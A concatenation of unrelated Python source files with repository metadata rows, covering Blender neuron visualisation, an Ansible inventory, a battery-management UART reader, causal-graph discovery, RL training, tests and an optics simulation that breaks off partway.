node_group.view.remove()
node_group.view = None
# Update blender node group with the data received from NRN
node_group.from_full_NEURON_group(nrn_group)
def get_selected_groups(self):
return [group for group in self.groups.values() if group.selected]
def get_group_dicts(self, group_list):
return [group.to_dict() for group in group_list]
@property
def synapse_sets(self):
return bpy.context.scene.BlenderNEURON.synapse_sets
def add_synapse_set(self, name=None):
new_set = self.synapse_sets.add()
if name is None:
i_name = len(self.synapse_sets.values())
while True:
name = "SynapseSet." + str(i_name).zfill(3)
if name in self.synapse_sets.keys():
i_name += 1
else:
break
new_set.name = name
return new_set
def display_groups(self):
for group in self.groups.values():
if group.selected:
print('Showing group ' + group.name + ' in Blender')
group.show()
else:
group.remove_view()
def add_neon_effect(self):
"""
Adds glare filter to the compositing node tree
:return:
"""
scene = bpy.context.scene
scene.use_nodes = True
links = scene.node_tree.links
nodes = scene.node_tree.nodes
layers = nodes.get('Render Layers')
if layers is None:
layers = nodes.new('CompositorNodeRLayers')
glare = nodes.new('CompositorNodeGlare')
composite = nodes.get('Composite')
if composite is None:
composite = nodes.new('CompositorNodeComposite')
links.new(layers.outputs['Image'], glare.inputs['Image'])
links.new(glare.outputs['Image'], composite.inputs['Image'])
glare.quality = 'MEDIUM'
glare.iterations = 3
glare.color_modulation = 0.2
glare.threshold = 0.1
glare.streaks = 7
glare.fade = 0.75
| 30.268041 | 81 | 0.56812 | 676 | 5,872 | 4.744083 | 0.252959 | 0.022451 | 0.016215 | 0.013096 | 0.110384 | 0.076084 | 0.067976 | 0.067976 | 0.067976 | 0 | 0 | 0.003957 | 0.354394 | 5,872 | 193 | 82 | 30.42487 | 0.841994 | 0.128236 | 0 | 0.142857 | 0 | 0 | 0.04469 | 0.00902 | 0 | 0 | 0 | 0 | 0 | 1 | 0.116071 | false | 0 | 0.053571 | 0.035714 | 0.25 | 0.017857 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
bf90f187c224578a009a7b143999adefdfe7e863 | 3,383 | py | Python | inventory/zero.py | fbartels/zero | 370becc20bc6b89b4453ce71af31c4e5da972372 | [
"MIT"
] | null | null | null | inventory/zero.py | fbartels/zero | 370becc20bc6b89b4453ce71af31c4e5da972372 | [
"MIT"
] | null | null | null | inventory/zero.py | fbartels/zero | 370becc20bc6b89b4453ce71af31c4e5da972372 | [
"MIT"
] | null | null | null | #!/usr/bin/env python3
import os
import sys
import argparse
import subprocess
try:
import json
except ImportError:
import simplejson as json
class ZeroInventory(object):
def __init__(self):
self.inventory = {}
self.read_cli_args()
# Called with `--list`.
if self.args.list:
self.inventory = self.zero_inventory()
# Called with `--host [hostname]`.
elif self.args.host:
# Not implemented, since we return _meta info `--list`.
self.inventory = self.zero_inventory()
# If no groups or vars are present, return an empty inventory.
else:
self.inventory = self.empty_inventory()
print(self.inventory)
# Example inventory for testing.
def zero_inventory(self):
inventory = {
"all": {
"hosts": []
},
"_meta": {
"hostvars": {}
}
}
# Check if TERRAFORM_ENABLED is set
terraform_enabled = int(os.getenv('TERRAFORM_ENABLED', 0))
# Check if ZERO_NODES is set
if not terraform_enabled:
# We're running on a custom inventory
zero_nodes = os.getenv('ZERO_NODES', "")
if zero_nodes and zero_nodes != "":
i = 1
#node_count = zero_nodes.split(",").length
for node in zero_nodes.split(","):
inventory['all']['hosts'].append("zero-{}".format(i))
inventory['_meta']['hostvars']["zero-{}".format(i)] = {
"ansible_host": node
}
i += 1
# Set Docker Group
inventory["docker"] = []
for node in inventory['all']['hosts']:
inventory["docker"].append(node)
# Set Manager Group
inventory["manager"] = []
for node in inventory['all']['hosts']:
inventory["manager"].append(node)
# Set Swarm Group
inventory["swarm"] = {
"children": ["docker"]
}
# Set Storidge Group
inventory["storidge"] = {
"children": ["manager"]
}
inventory = json.dumps(inventory)
else:
inventory_path = os.path.dirname(os.path.abspath(__file__))
tf_path = "{}/{}".format(inventory_path,"../terraform/")
os.environ["TF_STATE"] = tf_path
os.environ["TF_HOSTNAME_KEY_NAME"] = "name"
args = sys.argv[1:]
command = ["/usr/local/bin/terraform-inventory"] + args + [tf_path]
process = subprocess.run(command, check=True, stdout=subprocess.PIPE, universal_newlines=True)
inventory = process.stdout
return inventory
# Empty inventory for testing.
def empty_inventory(self):
return {'_meta': {'hostvars': {}}}
# Read the command line args passed to the script.
def read_cli_args(self):
parser = argparse.ArgumentParser()
parser.add_argument('--list', action = 'store_true')
parser.add_argument('--host', action = 'store')
self.args = parser.parse_args()
# Get the inventory.
ZeroInventory() | 32.219048 | 106 | 0.516406 | 331 | 3,383 | 5.132931 | 0.362538 | 0.037081 | 0.040024 | 0.02472 | 0.081224 | 0.081224 | 0.041201 | 0 | 0 | 0 | 0 | 0.002328 | 0.365061 | 3,383 | 105 | 107 | 32.219048 | 0.788641 | 0.155779 | 0 | 0.085714 | 0 | 0 | 0.107042 | 0.011972 | 0 | 0 | 0 | 0 | 0 | 1 | 0.057143 | false | 0 | 0.1 | 0.014286 | 0.2 | 0.014286 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
bf92f177f7ec59a72d055c6c761cbe15cbc82589 | 1,743 | py | Python | bms_fsm.py | dsoto/ASI-ENNOID-dashboard | 8391b4acee770306931c3cf46fd46ec6e96eb4ba | [
"CC-BY-4.0"
] | 1 | 2022-03-03T21:38:06.000Z | 2022-03-03T21:38:06.000Z | bms_fsm.py | dsoto/ASI-ENNOID-dashboard | 8391b4acee770306931c3cf46fd46ec6e96eb4ba | [
"CC-BY-4.0"
] | null | null | null | bms_fsm.py | dsoto/ASI-ENNOID-dashboard | 8391b4acee770306931c3cf46fd46ec6e96eb4ba | [
"CC-BY-4.0"
] | null | null | null | import board
import busio
import struct
import time
class BMS_FSM():
def __init__(self):
# self.bms_uart = busio.UART(board.TX, board.RX, baudrate=115200) # Feather M4
self.bms_uart = busio.UART(board.D18, board.D19, baudrate=115200) # Grand Central
self.bms_request = bytes([0x02, 0x01, 0x04, 0x40, 0x84, 0x03])
self.response = []
self.state = 'request'
def update(self, vehicle_data):
# print('b', time.monotonic())
# print('e', time.monotonic())
# if self.state == 'request':
if True:
# print('br', time.monotonic())
self.bms_uart.write(self.bms_request)
self.state = 'process'
# return vehicle_data
# elif self.state == 'process':
if True:
# print('bp', time.monotonic())
try:
self.response = self.bms_uart.read(48) # ENNOID 48 DBMS 53
# if reading battery from BMS
vehicle_data['battery_voltage_BMS'] = struct.unpack('>L', self.response[3:7],)[0] / 1000.
vehicle_data['battery_current_BMS'] = -struct.unpack('>l', self.response[7:11])[0] / 1000.
vehicle_data['high_cell_voltage'] = struct.unpack('>L', self.response[12:16])[0] / 1000.0
vehicle_data['low_cell_voltage'] = struct.unpack('>L', self.response[20:24])[0] / 1000.0
vehicle_data['high_battery_temp'] = struct.unpack('>h', self.response[34:36])[0] / 10.0
vehicle_data['high_BMS_temp'] = struct.unpack('>h', self.response[38:40])[0] / 10.0
self.state = 'request'
except:
print('BMS response failed')
return vehicle_data
| 37.891304 | 106 | 0.567413 | 217 | 1,743 | 4.410138 | 0.373272 | 0.103448 | 0.045977 | 0.071055 | 0.282132 | 0.246604 | 0.075235 | 0 | 0 | 0 | 0 | 0.074014 | 0.286862 | 1,743 | 45 | 107 | 38.733333 | 0.695897 | 0.189902 | 0 | 0.148148 | 0 | 0 | 0.109364 | 0 | 0 | 0 | 0.017155 | 0 | 0 | 1 | 0.074074 | false | 0 | 0.148148 | 0 | 0.296296 | 0.037037 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
bf94ecc0db6e188b273d33a45521f2cb0f748165 | 7,660 | py | Python | further/pc_algorithm.py | alan-turing-institute/pcit | d8e3b7894d1ecbfed3a3405a31276ff4e9122f67 | [
"MIT"
] | 4 | 2018-11-06T09:54:44.000Z | 2022-01-19T20:23:50.000Z | further/pc_algorithm.py | alan-turing-institute/pcit | d8e3b7894d1ecbfed3a3405a31276ff4e9122f67 | [
"MIT"
] | 1 | 2018-02-04T18:10:43.000Z | 2018-02-04T18:10:43.000Z | further/pc_algorithm.py | alan-turing-institute/pcit | d8e3b7894d1ecbfed3a3405a31276ff4e9122f67 | [
"MIT"
] | 2 | 2018-12-26T10:06:25.000Z | 2020-03-19T03:37:32.000Z | import itertools
import matplotlib.pyplot as plt
import networkx as nx
import numpy as np
from pcit.IndependenceTest import pred_indep
class descendants():
def __init__(self, skeleton):
self.skeleton = skeleton
self.desc = list()
def dir_desc(self, i):
n = self.skeleton.shape[1]
self.desc.extend([x for x in range(n) if (self.skeleton[i, x] == 2) and (x not in self.desc)])
return self.desc
def all_desc(self, i):
self.dir_desc(i)
old_len = -1
new_len = 0
while old_len < new_len:
old_len = new_len
for q in self.desc:
self.dir_desc(q)
new_len = len(self.desc)
return self.desc
def undir_neighb(self, i):
n = self.skeleton.shape[1]
neighbours = [x for x in range(n) if self.skeleton[i, x] == 1]
return neighbours
class find_dag():
def __init__(self, X, confidence=0.05, whichseed=1):
self.confidence = confidence
self.cond_sets = dict()
self.X = X
self.skeleton = None
self.n = self.X.shape[1]
np.random.seed(whichseed)
def powerset(self, n, p, q, i):
xs = list(range(n))
combinations = itertools.chain.from_iterable(itertools.combinations(xs, n) for n in range(len(xs) + 1))
combinations = [x for x in combinations if len(x) == i and p not in x and q not in x]
return combinations
def find_forks(self, n):
combinations = self.powerset(n, [], [], 3)
combinations = [x for x in combinations if (self.skeleton[x[0], x[1]] + self.skeleton[x[0], x[2]] +
self.skeleton[x[1], x[2]] == 2) and (
2 not in (self.skeleton[x[0], x[1]], self.skeleton[x[0], x[2]],
self.skeleton[x[1], x[2]]))]
middle_node = [[i for i in x if np.sum(self.skeleton[i, x]) == 2] for x in combinations]
edge_nodes = [[i for i in x if not np.sum(self.skeleton[i, x]) == 2] for x in combinations]
return middle_node, edge_nodes
def cond_indep_test(self, X, Y, Z='empty'):
p_values_adj, temp, temp = pred_indep(Y, X, z = Z)
return p_values_adj
def test_indep(self, p, q, i):
if i == 0:
depend = 1
p_val, temp, temp = pred_indep(np.reshape(self.X[:, p], (-1, 1)), np.reshape(self.X[:, q], (-1, 1)))
if p_val > self.confidence:
depend = 0
self.cond_sets[p, q] = ()
else:
n = self.X.shape[1]
combinations = self.powerset(n, p, q, i)
depend = 1
for idx in combinations:
p_val = self.cond_indep_test(np.reshape(self.X[:, p],(-1,1)), np.reshape(self.X[:, q],(-1,1)),
np.reshape(self.X[:, idx], (-1, len(idx))))
if p_val > self.confidence: #/ self.number_tests:
depend = 0
self.cond_sets[p, q] = idx
break
self.number_tests += 1
return depend
def pc_skeleton(self):
n = self.n
self.skeleton = np.array([[int(x > y) for x in range(n)] for y in range(n)])
i = 0
while i < n:
for q in range(n):
for p in range(n):
link = self.skeleton[p, q]
if link == 0:
pass
else:
self.skeleton[p, q] = self.test_indep(p, q, i)
i += 1
self.skeleton = np.maximum(self.skeleton, self.skeleton.transpose())
print(self.cond_sets)
return self.skeleton
def step1(self):
old_skel = 0
while old_skel < np.sum(self.skeleton == 2):
old_skel = np.sum(self.skeleton == 2)
for i in range(self.n):
z = descendants(self.skeleton).dir_desc(i)
if len(z) == 0:
continue
for j in z:
y = descendants(self.skeleton).undir_neighb(j)
if len(y) == 0:
continue
for k in y:
self.skeleton[j, k] = 2
self.skeleton[k, j] = 0
break
break
break
def step2(self):
old_skel = 0
while old_skel < np.sum(self.skeleton == 2):
old_skel = np.sum(self.skeleton == 2)
for i in range(self.n):
z = descendants(self.skeleton).all_desc(i)
y = descendants(self.skeleton).undir_neighb(i)
y = [x for x in y if x in z]
if len(y) == 0:
continue
self.skeleton[i, y] = 2
self.skeleton[y, i] = 0
break
def step3(self):
old_skel = 0
while old_skel < np.sum(self.skeleton == 2):
old_skel = np.sum(self.skeleton == 2)
middle_node, edge_nodes = self.find_forks(self.n)
for i in range(len(middle_node)):
x_desc = descendants(self.skeleton).dir_desc(edge_nodes[i][0])
y_desc = descendants(self.skeleton).dir_desc(edge_nodes[i][1])
z_neighb = descendants(self.skeleton).undir_neighb(middle_node[i])
w = list(set(x_desc) & set(y_desc) & set(z_neighb))
if len(w) == 0:
continue
self.skeleton[w, middle_node[i]] = 2
self.skeleton[middle_node[i], w] = 0
break
def find_v_struct(self):
middle_node, edge_nodes = self.find_forks(self.n)
for i in range(len(middle_node)):
if middle_node[i][0] in self.cond_sets[tuple(edge_nodes[i])]:
self.skeleton[middle_node[i][0], edge_nodes[i][0]] = 0
self.skeleton[middle_node[i][0], edge_nodes[i][1]] = 0
self.skeleton[edge_nodes[i][0], middle_node[i][0]] = 2
self.skeleton[edge_nodes[i][1], middle_node[i][0]] = 2
return self.skeleton
def pc_dag(self):
self.pc_skeleton()
print('finished skeleton learning')
self.find_v_struct()
old_skel = None
while not np.array_equal(old_skel, self.skeleton):
old_skel = self.skeleton.copy()
self.step1()
self.step2()
self.step3()
for i in range(self.n):
for j in range(i):
if self.skeleton[i, j] == 1 and any(self.skeleton[:, i] == 2):
self.skeleton[i, j] = 2
self.skeleton[j, i] = 0
desc_dict = dict()
for i in range(self.n):
desc_dict[i] = descendants(self.skeleton).all_desc(i)
i = 0
ancestral_order = list()
while len(desc_dict) > 0:
desc_round = sum([desc_dict[i] for i in desc_dict], [])
ancestral_order += [x for x in range(self.n) if x not in desc_round + ancestral_order]
[desc_dict.pop(i, None) for i in ancestral_order]
i += 1
for i in range(self.n):
for j in range(i):
if self.skeleton[i, j] == 1 and ancestral_order[i] > ancestral_order[j]:
self.skeleton[i, j] = 2
self.skeleton[j, i] = 0
self.skeleton = self.skeleton / 2
G = nx.from_numpy_matrix(self.skeleton, create_using = nx.DiGraph())
nx.draw_networkx(G)
plt.show()
return self.skeleton | 37.184466 | 112 | 0.503916 | 1,052 | 7,660 | 3.54943 | 0.11692 | 0.192823 | 0.017675 | 0.036422 | 0.436797 | 0.369041 | 0.313069 | 0.271291 | 0.271291 | 0.229513 | 0 | 0.020694 | 0.375457 | 7,660 | 206 | 113 | 37.184466 | 0.759824 | 0.002611 | 0 | 0.308989 | 0 | 0 | 0.004058 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.08427 | false | 0.005618 | 0.02809 | 0 | 0.179775 | 0.011236 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
bf97afb110f8b2e8ba3c9d7ed701726cf642cd46 | 2,823 | py | Python | train.py | erick-alv/g-hgg | 2cc0de9810ca6823ad6339cf4d1a63e265d1b5ee | [
"MIT"
] | null | null | null | train.py | erick-alv/g-hgg | 2cc0de9810ca6823ad6339cf4d1a63e265d1b5ee | [
"MIT"
] | null | null | null | train.py | erick-alv/g-hgg | 2cc0de9810ca6823ad6339cf4d1a63e265d1b5ee | [
"MIT"
] | null | null | null | import numpy as np
import time
from common import get_args, experiment_setup
from copy import deepcopy
import pickle
import tensorflow as tf
if __name__=='__main__':
# Getting arguments from command line + defaults
# Set up learning environment including, gym env, ddpg agent, hgg/normal learner, tester
args = get_args()
env, env_test, agent, buffer, learner, tester = experiment_setup(args)
args.logger.summary_init(agent.graph, agent.sess)
# Progress info
args.logger.add_item('Epoch')
args.logger.add_item('Cycle')
args.logger.add_item('Episodes@green')
args.logger.add_item('Timesteps')
args.logger.add_item('TimeCost(sec)')
best_success = -1
# Algorithm info
for key in agent.train_info.keys():
args.logger.add_item(key, 'scalar')
# Test info
for key in tester.info:
args.logger.add_item(key, 'scalar')
args.logger.summary_setup()
counter= 0
# Learning
for epoch in range(args.epoches):
for cycle in range(args.cycles):
args.logger.tabular_clear()
args.logger.summary_clear()
start_time = time.time()
# Learn
goal_list = learner.learn(args, env, env_test, agent, buffer, write_goals=args.show_goals)
# Log learning progresss
tester.cycle_summary()
args.logger.add_record('Epoch', str(epoch)+'/'+str(args.epoches))
args.logger.add_record('Cycle', str(cycle)+'/'+str(args.cycles))
args.logger.add_record('Episodes', buffer.counter)
args.logger.add_record('Timesteps', buffer.steps_counter)
args.logger.add_record('TimeCost(sec)', time.time()-start_time)
# Save learning progress to progress.csv file
args.logger.save_csv()
args.logger.tabular_show(args.tag)
args.logger.summary_show(buffer.counter)
# Save latest policy
policy_file = args.logger.my_log_dir + "saved_policy-latest"
agent.saver.save(agent.sess, policy_file)
# Save policy if new best_success was reached
if args.logger.values["Success"] > best_success:
best_success = args.logger.values["Success"]
policy_file = args.logger.my_log_dir + "saved_policy-best"
agent.saver.save(agent.sess, policy_file)
args.logger.info("Saved as best policy to {}!".format(args.logger.my_log_dir))
# Save periodic policy every epoch
policy_file = args.logger.my_log_dir + "saved_policy"
agent.saver.save(agent.sess, policy_file, global_step=epoch)
args.logger.info("Saved periodic policy to {}!".format(args.logger.my_log_dir))
# Plot current goal distribution for visualization (G-HGG only)
if args.learn == 'hgg' and goal_list and args.show_goals != 0:
name = "{}goals_{}".format(args.logger.my_log_dir, epoch)
if args.graph:
learner.sampler.graph.plot_graph(goals=goal_list, save_path=name)
with open('{}.pkl'.format(name), 'wb') as file:
pickle.dump(goal_list, file)
tester.epoch_summary()
tester.final_summary()
| 32.079545 | 93 | 0.735034 | 419 | 2,823 | 4.770883 | 0.28401 | 0.145073 | 0.078039 | 0.05953 | 0.241621 | 0.203102 | 0.14007 | 0.090545 | 0.058529 | 0 | 0 | 0.001233 | 0.138151 | 2,823 | 87 | 94 | 32.448276 | 0.820386 | 0.145944 | 0 | 0.072727 | 0 | 0 | 0.102671 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.109091 | 0 | 0.109091 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
bf9c9f2ad47c2493e56e5746ab85cc6e452ae864 | 1,371 | py | Python | tests/fast/test_pickle.py | evinism/littlebaker | d4eac27c23999274397aecdb719c465b13306f26 | [
"MIT"
] | 19 | 2020-12-04T02:39:04.000Z | 2020-12-04T21:45:09.000Z | tests/fast/test_pickle.py | evinism/littlebaker | d4eac27c23999274397aecdb719c465b13306f26 | [
"MIT"
] | 13 | 2020-12-04T22:20:26.000Z | 2021-04-29T05:39:51.000Z | tests/fast/test_pickle.py | evinism/littlebaker | d4eac27c23999274397aecdb719c465b13306f26 | [
"MIT"
] | 1 | 2021-04-28T06:21:01.000Z | 2021-04-28T06:21:01.000Z | from tinybaker import Transform, InputTag, OutputTag, sequence
import pickle
class StepOne(Transform):
foo = InputTag("foo")
bar = OutputTag("bar")
def script(self):
with self.foo.open() as f:
data = f.read()
with self.bar.open() as f:
f.write(data)
class StepTwo(Transform):
bar = InputTag("bar")
baz = OutputTag("baz")
def script(self):
with self.bar.open() as f:
data = f.read()
with self.baz.open() as f:
f.write(data + " processed")
class StepThree(Transform):
baz = InputTag("baz")
bleep = InputTag("bleep")
boppo = OutputTag("boppo")
def script(self):
with self.baz.open() as f:
data = f.read()
with self.bleep.open() as f:
data2 = f.read()
with self.boppo.open() as f:
f.write(data + " " + data2)
BaseSeq = sequence([StepOne, sequence([StepTwo, StepThree])])
def test_pickle_nested_sequence():
Seq = pickle.loads(pickle.dumps(BaseSeq))
Seq(
input_paths={
"foo": "./tests/__data__/foo.txt",
"bleep": "./tests/__data__/bleep.txt",
},
output_paths={"boppo": "/tmp/boppo"},
overwrite=True,
).run()
with open("/tmp/boppo", "r") as f:
assert f.read() == "foo contents processed bleep contents"
| 23.637931 | 66 | 0.557257 | 166 | 1,371 | 4.524096 | 0.283133 | 0.031957 | 0.065246 | 0.069241 | 0.263648 | 0.201065 | 0.095872 | 0.095872 | 0 | 0 | 0 | 0.002064 | 0.293217 | 1,371 | 57 | 67 | 24.052632 | 0.772962 | 0 | 0 | 0.238095 | 0 | 0 | 0.114515 | 0.03647 | 0 | 0 | 0 | 0 | 0.02381 | 1 | 0.095238 | false | 0 | 0.047619 | 0 | 0.380952 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
bf9d1c229636cf8e73b8136dc8f76f750b3401fc | 1,711 | py | Python | tests/actors/accessibility/test_accessibility.py | reapler/geckordp | 29dab2e6e691954a473e054fa95ba40a3ad10e53 | [
"MIT"
] | 1 | 2021-12-24T04:37:02.000Z | 2021-12-24T04:37:02.000Z | tests/actors/accessibility/test_accessibility.py | jpramosi/geckordp | 29dab2e6e691954a473e054fa95ba40a3ad10e53 | [
"MIT"
] | 1 | 2021-07-23T13:38:36.000Z | 2021-08-07T14:17:54.000Z | tests/actors/accessibility/test_accessibility.py | reapler/geckordp | 29dab2e6e691954a473e054fa95ba40a3ad10e53 | [
"MIT"
] | 1 | 2021-10-31T17:31:35.000Z | 2021-10-31T17:31:35.000Z | # pylint: disable=unused-import
import pytest
import tests.helpers.constants as constants
from tests.helpers.utils import *
from geckordp.rdp_client import RDPClient
from geckordp.actors.root import RootActor
from geckordp.actors.descriptors.tab import TabActor
from geckordp.actors.accessibility.accessibility import AccessibilityActor
from geckordp.logger import log, logdict
def init():
cl = RDPClient(3)
cl.connect(constants.REMOTE_HOST, constants.REMOTE_PORT)
root = RootActor(cl)
current_tab = root.current_tab()
tab = TabActor(cl, current_tab["actor"])
actor_ids = tab.get_target()
accessibility = AccessibilityActor(cl, actor_ids["accessibilityActor"])
accessibility.bootstrap()
return cl, accessibility
def test_get_traits():
cl = None
try:
cl, accessibility = init()
val = accessibility.get_traits()
assert val.get("tabbingOrder", None) is not None
finally:
cl.disconnect()
def test_bootstrap():
cl = None
try:
cl, accessibility = init()
val = accessibility.bootstrap()
assert len(val.keys()) > 0
finally:
cl.disconnect()
def test_get_walker():
cl = None
try:
cl, accessibility = init()
val = accessibility.get_walker()
assert val.get("actor", None) is not None
finally:
cl.disconnect()
def test_get_simulator():
cl = None
try:
cl, accessibility = init()
val = accessibility.get_simulator()
simulator_id = val.get("actor", None)
if (simulator_id is None):
log("No simulator actor found, firefox is probably running in headless mode")
finally:
cl.disconnect()
| 26.734375 | 89 | 0.670953 | 202 | 1,711 | 5.579208 | 0.331683 | 0.053239 | 0.031943 | 0.039042 | 0.261757 | 0.261757 | 0.233363 | 0.233363 | 0.194321 | 0 | 0 | 0.001524 | 0.233197 | 1,711 | 63 | 90 | 27.15873 | 0.85747 | 0.016949 | 0 | 0.384615 | 0 | 0 | 0.068452 | 0 | 0 | 0 | 0 | 0 | 0.057692 | 1 | 0.096154 | false | 0 | 0.153846 | 0 | 0.269231 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
bfa007f01f0521a3952080258ba83656a9eeaff7 | 564 | py | Python | py/leetcode/DungeonGame.py | danyfang/SourceCode | 8168f6058648f2a330a7354daf3a73a4d8a4e730 | [
"MIT"
] | null | null | null | py/leetcode/DungeonGame.py | danyfang/SourceCode | 8168f6058648f2a330a7354daf3a73a4d8a4e730 | [
"MIT"
] | null | null | null | py/leetcode/DungeonGame.py | danyfang/SourceCode | 8168f6058648f2a330a7354daf3a73a4d8a4e730 | [
"MIT"
] | null | null | null | '''
Leetcode problem No 174 Dungeon Game
Solution written by Xuqiang Fang on 5 July, 2018
'''
class Solution(object):
def calculateMinimumHP(self, dungeon):
DP = [float("inf") for _ in dungeon[0]]
DP[-1] = 1
for i in reversed(xrange(len(dungeon))):
DP[-1] = max(DP[-1] - dungeon[i][-1], 1)
for j in reversed(xrange(len(dungeon[i]) - 1)):
min_HP_on_exit = min(DP[j], DP[j + 1])
DP[j] = max(min_HP_on_exit - dungeon[i][j], 1)
return DP[0]
def main():
s = Solution()
| 26.857143 | 62 | 0.547872 | 85 | 564 | 3.552941 | 0.458824 | 0.029801 | 0.033113 | 0.125828 | 0.172185 | 0 | 0 | 0 | 0 | 0 | 0 | 0.047859 | 0.296099 | 564 | 20 | 63 | 28.2 | 0.712846 | 0.150709 | 0 | 0 | 0 | 0 | 0.006369 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.166667 | false | 0 | 0 | 0 | 0.333333 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
bfa0480628cbd64765f0e794d146b8b1cadeec58 | 10,288 | py | Python | pw_make_radcool_structure.py | parkerwray/tmm | 8c27a56163d33de5955611eee35864c4485d1b2b | [
"MIT"
] | null | null | null | pw_make_radcool_structure.py | parkerwray/tmm | 8c27a56163d33de5955611eee35864c4485d1b2b | [
"MIT"
] | null | null | null | pw_make_radcool_structure.py | parkerwray/tmm | 8c27a56163d33de5955611eee35864c4485d1b2b | [
"MIT"
] | null | null | null | """
Import relevant modules
"""
from __future__ import division, print_function, absolute_import
#from tmm.tmm_core import (coh_tmm, unpolarized_RT, ellips,
# position_resolved, find_in_structure_with_inf)
from wptherml.wptherml.datalib import datalib
import tmm.tmm_core as tmm
from numpy import linspace, inf, pi, stack, array
import matplotlib.pyplot as plt
import matplotlib as mplib
from scipy.interpolate import interp1d, InterpolatedUnivariateSpline
#mplib.rcParams['lines.linewidth'] = 8
#mplib.rcParams['lines.markersize'] = 6
#mplib.rcParams['axes.titlesize'] = 30
#mplib.rcParams['axes.labelsize'] = 24
#mplib.rcParams['xtick.labelsize'] = 20
#mplib.rcParams['ytick.labelsize'] = 20
#mplib.rcParams['font.size'] = 20
"""
Define wavelength range of interest and layer thicknesses
"""
nm = 1e-9
lda = linspace(250, 30000,5000) # list of wavelengths in nm
##############################################################################
##############################################################################
#%%
#"""
#Run the TMM code per wavelength for SiO2 NP on Si using FITTED MATERIALS
#"""
#
#T_list = [];
#R_list = [];
#A_list = [];
#for lda0 in lda:
# n_list = [1, msio2rough_fn(lda0), msio2np_fn(lda0), msio2_fn(lda0), msi_fn(lda0), 1]
# inc_tmm_data = tmm.inc_tmm('s',n_list,d_list,c_list,theta,lda0)
# A_list.append(tmm.inc_absorp_in_each_layer(inc_tmm_data)) #stores as list of np.arrays
# T_list.append(inc_tmm_data['T'])
# R_list.append(inc_tmm_data['R'])
#
#Afit = stack(A_list, axis = 0) # convert list of np.arrays to single np.array
#Tfit = array(T_list, dtype = complex) # Convert list to array for math operations
#Rfit = array(R_list, dtype = complex) # Convert list to array for math operations
##############################################################################
##############################################################################
#%%
"""
Run the TMM code per wavelength for SiO2 NP on Si using IDEAL MATERIALS
"""
"""
Define materials of interest for layered film simulation
Notes:
1) materials are described in SI units
2) materials are stored in datalib
3) materials are output as m = n+j*k
4) materials are iterpolated in datalib based on input lda values
"""
#
#structure = {
# ### computation mode - inline means the structure and calculation
# ### type will be determined from the values of this dictionary
# 'mode': 'Inline',
# ### temperature of the structure - relevant for all thermal applications
# ### value is stored in attribute self.T
# 'Temperature': 500,
# ### actual materials the structure is made from
# ### values are stored in the attribute self.n
# #'Material_List': ['Air','SiO2', 'SiO2','Si3N4','Ag', 'Air'],
# 'Material_List': ['Air','Si3N4','SiO2','SiO2','Si3N4', 'Ag', 'Air'],
# ### thickness of each layer... terminal layers must be set to zero
# ### values are stored in attribute self.d
# 'Thickness_List': [0, 1.0e-6, 1.0e-6, 3.0e-6, 650e-9, 200.0e-9, 0], # You can not have the back reflector as the last layer!!!
# ### range of wavelengths optical properties will be calculated for
# ### values are stored in the array self.lam
# 'Lambda_List': [250e-9, 15000e-9, 5000],
# ## Calculate for explicit angular dependence
# 'EXPLICIT_ANGLE': 1,
# ## Calculate quantities related to radiative cooling
# 'COOLING': 1
# }
#
#
m = datalib.Material_RI(lda*nm, 'Si3N4') #convert lda to SI unit
msi3n4_fn = interp1d(lda, m, kind='linear') # make mat data a FUNCTION of lda, in nm
m = datalib.Material_RI(lda*nm, 'SiO2') #convert lda to SI unit
msio2_fn = interp1d(lda, m, kind='linear') # make mat data a FUNCTION of lda, in nm
m = datalib.Material_RI(lda*nm, 'Ag') #convert lda to SI unit
mag_fn = interp1d(lda, m, kind='linear') # make mat data a FUNCTION of lda, in nm
